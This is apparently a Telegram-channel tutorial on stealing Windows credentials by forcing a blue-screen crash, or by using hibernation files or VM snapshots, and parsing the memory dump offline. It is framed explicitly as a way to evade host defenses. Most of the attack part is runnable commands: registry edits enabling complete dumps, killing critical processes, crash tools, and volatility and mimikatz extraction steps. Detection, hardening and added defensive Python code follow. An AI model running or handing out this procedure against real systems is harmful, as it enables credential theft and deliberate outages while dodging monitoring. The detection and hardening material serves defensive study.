💀 Windows | Get passwords no one notices 🔑
Demo: https://t.me/DefenseEvasion/38
Intro
Local and domain cached credentials, tickets and similar secrets are stored in RAM, but extracting them from the live system is noisy and easily detected.
One alternative is to crash the target system to produce a complete memory dump, exfiltrate that file and process it offline, which evades the defenses running on the host.
There are also cases where a reboot is needed but restarts are restricted on the server or workstation; a BSoD bypasses that limitation too.
In this article
- How to prepare the system to BSoD
- How to BSoD
- If not BSoD, where to get passwords from?
- How to extract credentials
- Squeezing every last drop of RAM to gather information
- Blue team tips
Before we BSoD
0. Check that there is enough disk space for the memory dump
A complete memory dump is as large as the installed RAM. If free disk space is lower than that, this technique will not work.
1. Make sure the complete memory dump is enabled
(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled).CrashDumpEnabled -eq 1
1*. Enable if necessary
- GUI (System properties --> Advanced system settings --> Advanced --> Startup and Recovery --> Settings)
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
2. Make sure an existing MEMORY.DMP file can be overwritten
(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name Overwrite).Overwrite -eq 1
2*. Allow if necessary
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v Overwrite /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name Overwrite -Value 1 -Type DWord
3. Make sure pagefile.sys is large enough
For a complete memory dump, %SystemDrive%\pagefile.sys must be at least RAM size + 257 MB
How to BSoD
1. Terminate a critical process
taskkill /im csrss.exe /f
taskkill /im wininit.exe /f
taskkill /im svchost.exe /f
2. Start a critical process
wininit
This bug was fixed in Windows 11. Admin rights are required.
3. Start and kill your own critical process
C# implementation: https://github.com/GrumpBoat/ForceBSOD
ForceBSOD.exe
4. Ask a driver to cause problems
A custom driver can be used to generate a BSoD; NotMyFault from the Sysinternals package works this way.
Sysinternals implementation: https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault
It supports both GUI and CLI and offers several ways to crash the system.
notmyfault.exe /crash
5*. CrashOnCtrlScroll
Set the registry value that matches your keyboard type: create a REG_DWORD named CrashOnCtrlScroll with value 0x1 under:
- PS/2: HKLM\System\CurrentControlSet\Services\i8042prt\Parameters
- USB: HKLM\System\CurrentControlSet\Services\kbdhid\Parameters
- Hyper-V: HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters
Press and hold the rightmost Ctrl key, then press Scroll Lock twice.
6*. Raise a hard error with NtRaiseHardError
- https://github.com/peewpw/Invoke-BSOD/tree/master
- https://github.com/u0932478239/no-admin-bsod
- https://github.com/blueskychan-dev/FuckedUP
In tests, extracting passwords from a MEMORY.DMP file created with this technique failed.
What else if not RAM?
1. Hiberfil.sys
Path: %SystemDrive%\hiberfil.sys
It stores a compressed copy of RAM written before the system enters sleep/hibernation, so it must be decompressed first.
Convert it to .dmp format with one of these tools:
Hibr2Dmp.exe D:\Dumps\hiberfil.sys D:\Dumps\hiberfil.dmp
py vol.py -f D:\Dumps\hiberfil.sys imageinfo
py vol.py -f D:\Dumps\hiberfil.sys imagecopy --profile=<your_profile> -O D:\Dumps\hiberfil.raw
py vol.py -f D:\Dumps\hiberfil.raw --profile=<your_profile> raw2dmp -O D:\Dumps\hiberfil.dmp
*MoonSols Memory Toolkit is no longer officially distributed
2. Virtual machine snapshot
Convert it to .dmp format first, following the general approach:
VMware has vmss2core (a tool bundled with VMware Workstation)
vmss2core.exe -W D:\Dumps\snapshot.vmsn D:\Dumps\snapshot.vmem
How to extract credentials
volatility3
py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump
WinDbg + mimilib.dll
.load D:\Tools\mimilib.dll
!process 0 0 lsass.exe
.process /r /p <NUMBER_FROM_PREVIOUS_STEP>
!mimikatz
rekall + mimikatz plugin
Outdated and not recommended.
🎁 Bonus
RAM also contains a lot of useful information:
- browsers' data
- password managers' data
- registry
- all running processes
Search it for vulnerable services (unquoted service paths, for example) or use it to recon the installed software.
🔵 Detection
1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104 with command lines such as:
wmic recoveros set WriteToSystemLog = False
wmic recoveros set DebugInfoType = 1
wmic recoveros set DebugFilePath = <path>
wmic recoveros set OverwriteExistingDebugFile = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
taskkill /im <critical_process_name>
Stop-Process <critical_process_name>
2. Sysmon EventID 13
2.1. Suspicious changes to the crash dump parameters under CrashControl
3. Security EventID 4697, System EventID 7045
Service File Name: %SystemRoot%\system32\drivers\myfault.sys
4. Sysmon EventID 11
5. System EventID 12, 6008, 1001
The crash dump file could not be created due to a lack of free space on the destination drive. Increasing the amount of free space on the destination drive may help prevent this error.
The previous system shutdown at HH:mm:ss on DD/MM/YYYY was unexpected.
The computer has rebooted from a bugcheck. The bugcheck was: 0x000000ef (0xffffab8ea3c6a080, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: <GUID>.
6. Sysmon EventID 6
Every time NotMyFault launches, a Sysmon EventID 6 (driver loaded) is generated.
7. Security EventID 4663
SACL on %SystemRoot%\MEMORY.DMP must be configured
File access auditing must be configured:
auditpol /set /subcategory:"File System" /success:enable
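To show how the event IDs above fit together, here is an added example (not from the original post) that correlates them into one finding: CrashControl changes (4688 command lines, Sysmon 13), the BSoD trigger (critical process kill, NotMyFault driver load via Sysmon 6 / System 7045) and the dump file write (Sysmon 11). The events are constructed dicts with simplified field names, not real event XML.

```python
import re

CRASHCONTROL_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\CrashControl"
# Command-line patterns taken from the "How to BSoD" and "Detection" steps above.
CMDLINE_RULES = [
    ("crashcontrol_cmdline", re.compile(r"CrashControl|wmic\s+recoveros", re.I)),
    ("critical_process_kill", re.compile(
        r"(taskkill\s+/im\s+|Stop-Process\s+(-Name\s+)?)(csrss|wininit|svchost)(\.exe)?", re.I)),
    ("notmyfault_run", re.compile(r"notmyfault\w*\.exe", re.I)),
]
STAGES = {  # the chain: prepare -> trigger -> collect
    "prepare": {"crashcontrol_cmdline", "crashcontrol_registry_write"},
    "trigger": {"critical_process_kill", "notmyfault_run", "notmyfault_driver_load"},
    "collect": {"crash_dump_file_created"},
}

SAMPLE_EVENTS = [  # constructed sample events, in rough chronological order
    {"channel": "Security", "id": 4688, "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f"},
    {"channel": "Sysmon", "id": 13, "target": CRASHCONTROL_KEY + r"\CrashDumpEnabled", "details": "DWORD (0x00000001)"},
    {"channel": "Security", "id": 4688, "cmdline": r"notepad.exe C:\notes.txt"},  # benign noise
    {"channel": "System", "id": 7045, "path": r"%SystemRoot%\system32\drivers\myfault.sys"},
    {"channel": "Sysmon", "id": 6, "path": r"C:\Windows\system32\drivers\myfault.sys"},
    {"channel": "Sysmon", "id": 11, "path": r"C:\Windows\MEMORY.DMP"},
]

def match_event(ev):
    """Return the names of the rules that fire on a single event."""
    chan, eid = ev["channel"], ev["id"]
    if (chan, eid) == ("Security", 4688):
        return [name for name, rx in CMDLINE_RULES if rx.search(ev["cmdline"])]
    if (chan, eid) == ("Sysmon", 13) and ev["target"].lower().startswith(CRASHCONTROL_KEY.lower()):
        return ["crashcontrol_registry_write"]
    if (chan, eid) in {("Sysmon", 6), ("System", 7045)} and ev["path"].lower().endswith("myfault.sys"):
        return ["notmyfault_driver_load"]
    if (chan, eid) == ("Sysmon", 11) and ev["path"].lower().endswith(".dmp"):
        return ["crash_dump_file_created"]
    return []

def analyze(events):
    """Group fired rules by name; escalate when two or more stages of the chain are seen."""
    findings = {}
    for ev in events:
        for name in match_event(ev):
            findings.setdefault(name, []).append(ev)
    seen = {stage for stage, names in STAGES.items() if names & set(findings)}
    severity = "high" if len(seen) >= 2 else ("medium" if findings else "none")
    return findings, severity
```

A single hit (for example one Sysmon 11 for a .dmp file) stays at medium, since legitimate crashes also write MEMORY.DMP; the combination with a preceding CrashControl change or a critical-process kill is what raises it.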
💪🏻 Hardening
1. Turn off hibernation
powercfg /hibernate off
2. Restrict access to crash dump files
Save crash dumps to folders that only designated users can access (strong DACL)
3. Do not allow full memory dump
Configure a GPO that periodically checks the CrashControl parameters, logs crash events to the Event Log and disables the complete memory dump
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v LogEvent /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 0 /f
Crash dumps help identify problems with software, drivers and so on, so setting CrashDumpEnabled to 0x0 is not recommended.
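As an added example (not from the original post) of the periodic CrashControl check described above, the script below parses the key from a reg export file and reports the weak settings. The export text is constructed; the CrashDumpEnabled meanings assumed here are the documented ones (1 = complete, 2 = kernel, 7 = automatic), and only a complete dump includes user-mode memory such as LSASS, which is what the technique in this post relies on.

```python
import re

# Constructed sample in the text format that "reg export" writes.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"CrashDumpEnabled"=dword:00000001
"Overwrite"=dword:00000001
"LogEvent"=dword:00000000
"DumpFile"=hex(2):44,00,3a,00,5c,00,44,00,75,00,6d,00,70,00,73,00,5c,00,4d,00,\
  45,00,4d,00,4f,00,52,00,59,00,2e,00,44,00,4d,00,50,00,00,00
"""

def parse_reg_export(text):
    """Return {value_name: value} for the exported key. Handles dword:, hex(2):
    (REG_EXPAND_SZ stored as UTF-16LE bytes, possibly continued with ",\") and
    quoted strings; other value types are ignored."""
    body = re.sub(r",\\\r?\n\s*", ",", text)  # join hex lines continued with ",\"
    values = {}
    pattern = r'^"([^"]+)"=(dword:[0-9a-f]+|hex\(2\):[0-9a-f,]+|"[^"]*")'
    for m in re.finditer(pattern, body, re.M | re.I):
        name, raw = m.group(1), m.group(2)
        if raw.lower().startswith("dword:"):
            values[name] = int(raw[6:], 16)
        elif raw.lower().startswith("hex(2):"):
            data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
            values[name] = data.decode("utf-16-le").rstrip("\x00")
        else:
            values[name] = raw.strip('"')
    return values

def audit_crashcontrol(values):
    """Return hardening findings as (severity, message) tuples, in a fixed order."""
    findings = []
    mode = values.get("CrashDumpEnabled")
    if mode == 1:
        findings.append(("high", "CrashDumpEnabled=1: complete dump includes user-mode "
                                 "memory (LSASS secrets); prefer 2 (kernel) or 7 (automatic)"))
    elif mode == 0:
        findings.append(("low", "CrashDumpEnabled=0: no dumps at all, troubleshooting data is lost"))
    if values.get("LogEvent", 0) != 1:
        findings.append(("medium", "LogEvent is not 1: bugchecks will not be logged to the System log"))
    dump = values.get("DumpFile", r"%SystemRoot%\MEMORY.DMP")  # Windows default path
    if not dump.lower().startswith("%systemroot%"):
        findings.append(("medium", f"DumpFile redirected to {dump}: verify the DACL on that folder"))
    return findings
```

Run it over the output of "reg export HKLM\SYSTEM\CurrentControlSet\Control\CrashControl <file>" collected from each host; a redirected DumpFile is not wrong by itself but is where the DACL check from step 2 applies.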